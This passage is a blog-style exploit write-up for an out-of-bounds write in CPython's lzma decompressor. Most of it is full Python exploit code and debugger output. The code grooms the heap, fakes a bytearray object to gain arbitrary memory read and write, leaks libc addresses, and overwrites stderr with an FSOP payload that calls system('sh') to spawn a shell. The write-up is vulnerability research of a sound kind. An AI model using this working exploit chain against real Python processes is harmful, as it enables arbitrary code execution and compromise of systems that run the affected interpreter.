    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'\x00' + b'\xfd'*16, 1)

I’m cheating a little bit here with the ctypes crap for debugging purposes. This is because by creating bytearrays, I’m creating a PyByteArrayObject that would sit in the pyheap, whereas the actual memory which contains the data (and more importantly, where the OOB write would occur) is instead in the glibc heap and an entry in the struct. So when calling id, you get the object’s address (the actually mutable crap) and the byte data sits elsewhere (somehow, this is relevant later).

Running this script, we now see that we can get structs that are kissing (the gap between the addresses is 2kB):

gef➤  r ../../test4.py
Starting program: ~/cpython/build-debug/python ../../test4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 5310 fillers of size 2.0kB each
Original data at 0x7ffff76ccbe0, 0x555556ab9910
Next thing at 0x7ffff76ccc40, 0x555556aba230
Decompressor is at 0x7ffff77c8f40
...
gef➤  x/20gx 0x555556aba230-0x80
0x555556aba1b0:	0x0008808011910100	0xfb67c4b18c5a88ba
0x555556aba1c0:	0x5a59040000000002	0xfdfdfdfdfdfdfd00
0x555556aba1d0:	0xfdfdfdfdfdfdfdfd	0xddddddddddddddfd
0x555556aba1e0:	0xdddddddddddddddd	0x0000000000000921
0x555556aba1f0:	0xf108000000000000	0xfdfdfdfdfdfdfd72
0x555556aba200:	0xd908000000000000	0xfdfdfdfdfdfdfd6f
0x555556aba210:	0x0000000000000001	0x0000555555d3f060
0x555556aba220:	0x00000000000008b8	0xffffffffffffffff
0x555556aba230:	0x0000000000000000	0x0000000000000000
0x555556aba240:	0x0000000000000000	0x0000000000000000

Ok, two things:

The Punishment for Using a Debug Build

Remember I said using a debug build is blasphemous? Here’s a quick excerpt from the Python documentation:

When Python is built in debug mode, the PyMem_SetupDebugHooks() function is called at the Python preinitialization to setup debug hooks on 
Python memory allocators to detect memory errors.

The PYTHONMALLOC environment variable can be used to install debug hooks on a Python compiled in release mode (ex: PYTHONMALLOC=debug).

The PyMem_SetupDebugHooks() function can be used to set debug hooks after calling PyMem_SetAllocator().

These debug hooks fill dynamically allocated memory blocks with special, recognizable bit patterns. 
Newly allocated memory is filled with the byte 0xCD (PYMEM_CLEANBYTE), freed memory is filled with the byte 0xDD (PYMEM_DEADBYTE). 
Memory blocks are surrounded by “forbidden bytes” filled with the byte 0xFD (PYMEM_FORBIDDENBYTE). 
Strings of these bytes are unlikely to be valid addresses, floats, or ASCII strings.

The purpose of this padding is so that developers can more easily catch these OOB bugs since writing over the forbidden bytes and so on will certainly trigger a crash. This is actually incredibly useful and an amazing feature.

However, this also means that writing my exploit becomes slightly more annoying and whatever I write for this debug build will not work on a release build. Dammit! Let’s shift over to a release build and wrap up our exploit.

Actually Getting Arb R/W

Okay okay so. Let’s think about what a useful struct to overflow into would be. We want some pointers that we can overwrite…

When allocating a large array, the backing array (i.e. the actual region of memory which contains the relevant pointers to the objects in the array) are thrown into the glibc heap, so if we can get that to kiss our bad buffer, then we might be able to make an array element point to a fake PyObject

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) 
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

payload = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZd'
    + b'A'*(2048-32+10)
)

c = bytearray(
        payload
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

Notice how it took me this long to realise I could just scam my way with an LZMA header and a bunch of 0x41s since we’re prematurely axing the decompression. Well, this arrangement is just nice to get the backing array of d to be adjacent to the backing memory of c.

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 6165 fillers of size 2.0kB each
Original data at 0x7ffff75b67f0
Next thing at 0x7ffff779f500
Decompressor is at 0x7ffff773c1f0
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  x/8gx 0x7ffff75b67f0 <-- this is the PyByteArrayObject of c
0x7ffff75b67f0:	0x0000000000000001	0x0000555555c35fa0
0x7ffff75b6800:	0x000000000000080b	0x000000000000080b
0x7ffff75b6810:	0x0000555556b023b0	0x0000555556b023b0 <-- this is the backing array address
0x7ffff75b6820:	0x0000000000000000	0x0000555556b02390
gef➤  x/20gx 0x0000555556b023b0
0x555556b023b0:	0x0400005a587a37fd	0x0000000046b4d6e6 <-- our LZMA data is here 
0x555556b023c0:	0x7df3b61f2144df1c	0x5a59040000000001
0x555556b023d0:	0x4141414141414164	0x4141414141414141
0x555556b023e0:	0x4141414141414141	0x4141414141414141
0x555556b023f0:	0x4141414141414141	0x4141414141414141
0x555556b02400:	0x4141414141414141	0x4141414141414141
0x555556b02410:	0x4141414141414141	0x4141414141414141
0x555556b02420:	0x4141414141414141	0x4141414141414141
0x555556b02430:	0x4141414141414141	0x4141414141414141
0x555556b02440:	0x4141414141414141	0x4141414141414141
gef➤  x/8gx 0x7ffff779f500 <-- this is the arrayobject of d
0x7ffff779f500:	0x0000000000000001	0x0000555555c47900
0x7ffff779f510:	0x0000000000000105	0x0000555556b02bd0 <-- this is the backing array address
0x7ffff779f520:	0x0000000000000105	0x00000000006e6f6d
0x7ffff779f530:	0x00007ffff779f431	0x00007ffff779f770
gef➤  x/20gx 0x0000555556b02bd0-0x40 <-- peeking a bit behind, we see they kiss <3
0x555556b02b90:	0x4141414141414141	0x4141414141414141
0x555556b02ba0:	0x4141414141414141	0x4141414141414141
0x555556b02bb0:	0x4141414141414141	0x0000000000414141
0x555556b02bc0:	0x0000000000000000	0x0000000000000831
0x555556b02bd0:	0x0000555555c7e860	0x0000555555c7e880
0x555556b02be0:	0x0000555555c7e8a0	0x0000555555c7e8c0
0x555556b02bf0:	0x0000555555c7e8e0	0x0000555555c7e900
0x555556b02c00:	0x0000555555c7e920	0x0000555555c7e940
0x555556b02c10:	0x0000555555c7e960	0x0000555555c7e980
0x555556b02c20:	0x0000555555c7e9a0	0x0000555555c7e9c0
gef➤  

Now, we can overwrite from the end of our fake LZMA buffer into the backing array! We just need to make it point to a fake PyObject struct, and of course the most useful would be… a PyByteArrayObject! If we fake a struct that just starts at, like, 0x0 or something and has an obscene size, we basically get arbitrary R/W across the entire memory space.

Where can we put our fake struct? For some reason, when doing up the exploit for the first time, I thought it would be really smart to put it in the fake LZMA buffer, then using a separate heap leak I’d calculate the offset to it. This was extremely painful, thoughless, and stupidly unreliable (even adding a single addition to the script would completely change the offset!). A quick set of texts with Lucas “samuzora” Tan showed me the error of my ways, thankfully (why even calculate an offset when you can just… use the payload position directly?).

So let’s get the following:

Our script now looks like this:

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

faker = (
    b'd\x00\x00\x00\x00\x00\x00\x00'     # ob_refcnt (non-zero)
    + struct.pack("<q", id(bytearray))     # ob_type
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_size
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_alloc
    + struct.pack("<q", id(int)-0x6f4680)  # ob_bytes (buffer pointer, we do PIE base)
    + struct.pack("<q", id(int)-0x6f4680)  # ob_start (just keep it the same)
    + b'\x00\x00\x00\x00\x00\x00\x00\x00'  # ob_exports
    + b'A'*2048 # padding to fall into glibc heap
)

lzma_buffer = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZ'
    + b'A'*(2048-32+10)
)

c = bytearray(
        lzma_buffer
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}")
    print(f"Next thing at {hex(id(d))}")
    print(f'Fake struct at {hex(id(faker))}')
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
# this is our OOB write!
a = decompressor.decompress(
    b'\x00'*6 # padding between our kissing objects
    + struct.pack("<q", 0x0)
    + struct.pack("<q", 0x831) # do not fuck the glibc header
    + struct.pack("<q", id(faker)+0x20), # address of our fake struct, +0x20 to account for the header
1)

input(f"OOB Write done!, array will start at {hex(id(int)-0x6f4680)}")

print(d[0][:256])

If you’re wondering what’s up with the x and e arrays and why we’re putting the lzma_buffer in a bytearray before calling decompress on it… uh… I couldn’t tell you. That’s just bad code and bad experimentation. This script can definitely be cleaner. Running this, we see that all of that actually worked!

➜  build-release git:(480edc1aae0) ✗ ./python ../../test4_1.py
Allocated 6172 fillers of size 2.0kB each
Original data at 0x7f797ee6ab30
Next thing at 0x7f797f06b380
Fake struct at 0x55ded7e3d6a0
Decompressor is at 0x7f797eff81f0
MemError triggered, decompressing again
OOB Write done!, array will start at 0x55de9a8b6000
bytearray(b'\x7fELF\x02\x01\x01...')

Wonderful. We now have arbitrary read and write and can do whatever we want. Like a crappy FSOP payload with hardcoded offsets.

# gonna need to make it to GOT with this one
leak = (d[0][0x6e0038:0x6e0038+8])

libc_base = int.from_bytes(leak,'little')-0x89ae0
print('libc base: ', hex(libc_base))
print('stderr: ', hex(libc_base+0x1e84a0))

elf_base = id(int)-0x6f4680
stderr = libc_base+0x1e84a0
wfile_jumps = libc_base+0x1e6228
system = libc_base+0x53b00

p64 = lambda x: struct.pack('<Q', x)
input("pause...")

fsop = b''.join([
    b"  sh\x00\x00\x00\x00",            # 0x00: flags
    p64(0),                             # 0x08: _IO_read_ptr
    p64(0),                             # 0x10: _IO_read_end
    p64(0),                             # 0x18: _IO_read_base
    p64(0),                             # 0x20: _IO_write_base
    p64(1),                             # 0x28: _IO_write_ptr
    p64(0) * 7,                         # 0x30 - 0x60: write_end, buf_base... to markers
    p64(system),                   # 0x68: chain
    p64(0) * 3,                         # 0x70 - 0x80: fileno, old_offset, cur_column
    p64(stderr + 0x210),            # 0x88: _lock (needs to point to writable nulls)
    p64(0),                             # 0x90: _offset
    p64(stderr),                   # 0x98: _codecvt
    p64(stderr - 0x48),            # 0xa0: _wide_data
    p64(0) * 6,                         # 0xa8 - 0xd0: freeres, pad, mode, unused
    p64(wfile_jumps)               # 0xd8: vtable
])

print(d[0][stderr-elf_base:stderr-elf_base+64])
d[0][stderr-elf_base:stderr-elf_base+len(fsop)] = fsop

And we get a shell :)

Fig: Winner winner chicken dinner

Conclusion

Was this a difficult bug to exploit? Eh… the hard part was honestly finagling the memory to behave how we want since the OOB write primitive itself is quite obvious to get to. Once you get the OOB write, then it’s just a matter of knowing what to do with it since you’re sitting in the sad glibc heap rather than the cool epic pyheap (I wasted a lot of time trying to figure out how to land the LZMA buffer in the pyheap with the memory exhaustion criteria).

So what did I learn from this?

Hopefully, you at least found this entertaining. Okay, ciao.